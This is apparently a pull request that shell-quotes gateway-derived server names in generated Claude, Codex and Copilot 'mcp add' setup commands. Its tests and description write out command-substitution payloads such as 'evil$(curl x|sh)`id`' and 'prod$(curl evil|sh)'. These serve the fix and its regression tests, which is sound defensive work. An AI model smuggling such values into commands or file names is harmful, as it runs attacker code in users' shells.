### PR TITLE
fix(connection): shell-quote server name in generated setup commands

### DIFF
--- a/platform/frontend/src/app/connection/clients.test.ts
+++ b/platform/frontend/src/app/connection/clients.test.ts
@@ -39,7 +39,7 @@ describe("Copilot CLI connection client", () => {
         serverName: "archestra",
       }),
     ).toBe(
-      "copilot mcp add --transport http archestra http://localhost:9000/v1/mcp/default",
+      "copilot mcp add --transport http 'archestra' 'http://localhost:9000/v1/mcp/default'",
     );
     expect(
       tokenSteps[0].buildCommand?.({
@@ -48,8 +48,43 @@ describe("Copilot CLI connection client", () => {
         serverName: "archestra",
       }),
     ).toBe(
-      'copilot mcp add --transport http --header "Authorization: Bearer archestra_TOKEN" archestra http://localhost:9000/v1/mcp/default',
+      "copilot mcp add --transport http --header 'Authorization: Bearer archestra_TOKEN' 'archestra' 'http://localhost:9000/v1/mcp/default'",
     );
+  });
+
+  it("neutralizes shell metacharacters in a gateway-derived server name", () => {
+    const client = getCopilotClient();
+    if (client.mcp.kind !== "custom") {
+      throw new Error("Copilot CLI MCP support should be custom");
+    }
+    const mcp = client.mcp;
+    const steps =
+      typeof mcp.steps === "function"
+        ? mcp.steps({
+            url: "http://localhost:9000/v1/mcp/default",
+            token: null,
+            serverName: "x",
+          })
+        : mcp.steps;
+
+    // A member-editable gateway name carrying a command-substitution payload
+    // must land inside a single-quoted arg, where `$()`/backticks are inert.
+    const command = steps[0].buildCommand?.({
+      url: "http://localhost:9000/v1/mcp/default",
+      token: null,
+      serverName: "evil$(curl x|sh)`id`",
+    });
+    expect(command).toBe(
+      "copilot mcp add --transport http 'evil$(curl x|sh)`id`' 'http://localhost:9000/v1/mcp/default'",
+    );
+
+    // An embedded single quote is escaped rather than closing the quoting.
+    const withQuote = steps[0].buildCommand?.({
+      url: "http://localhost:9000/v1/mcp/default",
+      token: null,
+      serverName: "a'b",
+    });
+    expect(withQuote).toContain("'a'\\''b'");
   });
 
   it("renders LLM Proxy settings Copilot CLI can consume", () => {

--- a/platform/frontend/src/app/connection/clients.ts
+++ b/platform/frontend/src/app/connection/clients.ts
@@ -184,7 +184,7 @@ export const CONNECT_CLIENTS: ConnectClient[] = [
           title: "Add the gateway",
           terminalTitle: "terminal",
           buildCommand: ({ url, serverName }) =>
-            `claude mcp add --transport http ${serverName} ${url}`,
+            `claude mcp add --transport http ${shellArg(serverName)} ${shellArg(url)}`,
         },
         {
           title:
@@ -424,7 +424,7 @@ claude`,
           body: "Codex opens your browser to complete the OAuth handshake automatically.",
           terminalTitle: "terminal",
           buildCommand: ({ url, serverName }) =>
-            `codex mcp add ${serverName} --url ${url}`,
+            `codex mcp add ${shellArg(serverName)} --url ${shellArg(url)}`,
         },
       ],
     },
@@ -480,13 +480,14 @@ requires_openai_auth = true`,
           terminalTitle: "terminal",
           buildCommand: ({ url, serverName, token }) =>
             token
-              ? `copilot mcp add --transport http --header "Authorization: Bearer ${token}" ${serverName} ${url}`
-              : `copilot mcp add --transport http ${serverName} ${url}`,
+              ? `copilot mcp add --transport http --header ${shellArg(`Authorization: Bearer ${token}`)} ${shellArg(serverName)} ${shellArg(url)}`
+              : `copilot mcp add --transport http ${shellArg(serverName)} ${shellArg(url)}`,
         },
         {
           title: "Verify the server",
           terminalTitle: "terminal",
-          buildCommand: ({ serverName }) => `copilot mcp get ${serverName}`,
+          buildCommand: ({ serverName }) =>
+            `copilot mcp get ${shellArg(serverName)}`,
         },
       ],
     },
@@ -762,3 +763,15 @@ export COPILOT_MODEL="<model-name>"`,
     proxy: { kind: "generic" },
   },
 ];
+
+// === Internal helpers ===
+
+/**
+ * Single-quote a value for safe pasting into a POSIX shell, mirroring the
+ * backend setup script's `sh()`. A gateway name is member-editable free text,
+ * so metacharacters (`$()`, backticks, `;`, `|`) must not break out of the
+ * generated copy-paste command into the user's shell.
+ */
+function shellArg(value: string): string {
+  return `'${value.replace(/'/g, `'\\''`)}'`;
+}

--- a/platform/frontend/src/app/connection_beta/clients.test.ts
+++ b/platform/frontend/src/app/connection_beta/clients.test.ts
@@ -39,7 +39,7 @@ describe("Copilot CLI connection client", () => {
         serverName: "archestra",
       }),
     ).toBe(
-      "copilot mcp add --transport http archestra http://localhost:9000/v1/mcp/default",
+      "copilot mcp add --transport http 'archestra' 'http://localhost:9000/v1/mcp/default'",
     );
     expect(
       tokenSteps[0].buildCommand?.({
@@ -48,8 +48,43 @@ describe("Copilot CLI connection client", () => {
         serverName: "archestra",
       }),
     ).toBe(
-      'copilot mcp add --transport http --header "Authorization: Bearer archestra_TOKEN" archestra http://localhost:9000/v1/mcp/default',
+      "copilot mcp add --transport http --header 'Authorization: Bearer archestra_TOKEN' 'archestra' 'http://localhost:9000/v1/mcp/default'",
     );
+  });
+
+  it("neutralizes shell metacharacters in a gateway-derived server name", () => {
+    const client = getCopilotClient();
+    if (client.mcp.kind !== "custom") {
+      throw new Error("Copilot CLI MCP support should be custom");
+    }
+    const mcp = client.mcp;
+    const steps =
+      typeof mcp.steps === "function"
+        ? mcp.steps({
+            url: "http://localhost:9000/v1/mcp/default",
+            token: null,
+            serverName: "x",
+          })
+        : mcp.steps;
+
+    // A member-editable gateway name carrying a command-substitution payload
+    // must land inside a single-quoted arg, where `$()`/backticks are inert.
+    const command = steps[0].buildCommand?.({
+      url: "http://localhost:9000/v1/mcp/default",
+      token: null,
+      serverName: "evil$(curl x|sh)`id`",
+    });
+    expect(command).toBe(
+      "copilot mcp add --transport http 'evil$(curl x|sh)`id`' 'http://localhost:9000/v1/mcp/default'",
+    );
+
+    // An embedded single quote is escaped rather than closing the quoting.
+    const withQuote = steps[0].buildCommand?.({
+      url: "http://localhost:9000/v1/mcp/default",
+      token: null,
+      serverName: "a'b",
+    });
+    expect(withQuote).toContain("'a'\\''b'");
   });
 
   it("renders LLM Proxy settings Copilot CLI can consume", () => {

--- a/platform/frontend/src/app/connection_beta/clients.ts
+++ b/platform/frontend/src/app/connection_beta/clients.ts
@@ -191,7 +191,7 @@ export const CONNECT_CLIENTS: ConnectClient[] = [
           title: "Add the gateway",
           terminalTitle: "terminal",
           buildCommand: ({ url, serverName }) =>
-            `claude mcp add --transport http ${serverName} ${url}`,
+            `claude mcp add --transport http ${shellArg(serverName)} ${shellArg(url)}`,
         },
         {
           title:
@@ -417,7 +417,7 @@ claude`,
           body: "Codex opens your browser to complete the OAuth handshake automatically.",
           terminalTitle: "terminal",
           buildCommand: ({ url, serverName }) =>
-            `codex mcp add ${serverName} --url ${url}`,
+            `codex mcp add ${shellArg(serverName)} --url ${shellArg(url)}`,
         },
       ],
     },
@@ -473,13 +473,14 @@ requires_openai_auth = true`,
           terminalTitle: "terminal",
           buildCommand: ({ url, serverName, token }) =>
             token
-              ? `copilot mcp add --transport http --header "Authorization: Bearer ${token}" ${serverName} ${url}`
-              : `copilot mcp add --transport http ${serverName} ${url}`,
+              ? `copilot mcp add --transport http --header ${shellArg(`Authorization: Bearer ${token}`)} ${shellArg(serverName)} ${shellArg(url)}`
+              : `copilot mcp add --transport http ${shellArg(serverName)} ${shellArg(url)}`,
         },
         {
           title: "Verify the server",
           terminalTitle: "terminal",
-          buildCommand: ({ serverName }) => `copilot mcp get ${serverName}`,
+          buildCommand: ({ serverName }) =>
+            `copilot mcp get ${shellArg(serverName)}`,
         },
       ],
     },
@@ -755,3 +756,15 @@ export COPILOT_MODEL="<model-name>"`,
     proxy: { kind: "generic" },
   },
 ];
+
+// === Internal helpers ===
+
+/**
+ * Single-quote a value for safe pasting into a POSIX shell, mirroring the
+ * backend setup script's `sh()`. A gateway name is member-editable free text,
+ * so metacharacters (`$()`, backticks, `;`, `|`) must not break out of the
+ * generated copy-paste command into the user's shell.
+ */
+function shellArg(value: string): string {
+  return `'${value.replace(/'/g, `'\\''`)}'`;
+}


### PR DESCRIPTION
## Problem

The `/connection` setup flow generates `claude`/`codex`/`copilot mcp add` commands for the user to **copy-paste into their own shell**. The gateway-derived server name was interpolated raw. A gateway `name` is member-editable free text (`memberPermissions.mcpGateway: ["create","update"]`), and `deriveMcpServerName` only lowercases + collapses whitespace — it does not neutralize shell metacharacters. So a gateway named e.g. `` prod$(curl evil|sh) `` produces a command that runs the payload when a teammate pastes it.

The backend's own executable-script path already single-quotes this exact data via an `sh()` helper (`connection-setup-script.ts`); only the two frontend command generators skipped it.

## Fix

Add a module-private `shellArg()` (identical to the backend `sh()`) and apply it to `serverName`, `url`, and the auth header at every shell command site in both `connection/clients.ts` and `connection_beta/clients.ts`. Quoting neutralizes metacharacters **in transit** without changing the derived name value, so the FE/BE name-match (what the user sees in `claude /mcp`) is preserved. Non-shell contexts (`buildHref` Cursor URL, `buildConfig` JSON) are correctly left untouched.

## Tests

`clients.test.ts` (both trees): updated the copilot assertions to the quoted output and added a metacharacter-neutralization case (`$(curl x|sh)` `` `id` `` lands inside a single-quoted arg) plus an embedded-single-quote escaping case.

https://claude.ai/code/session_01XrgWmw4aievNj85q6axVNb

---
<!-- archestra-banner:v1 -->
<a href="https://archestra.ai/contributor-onboard" rel="nofollow noreferrer noopener" target="_blank">

<img alt="Archestra Contributor" src="https://raw.githubusercontent.com/archestra-ai/archestra/main/docs/assets/archestra-contributor-banner.webp"/>

</a>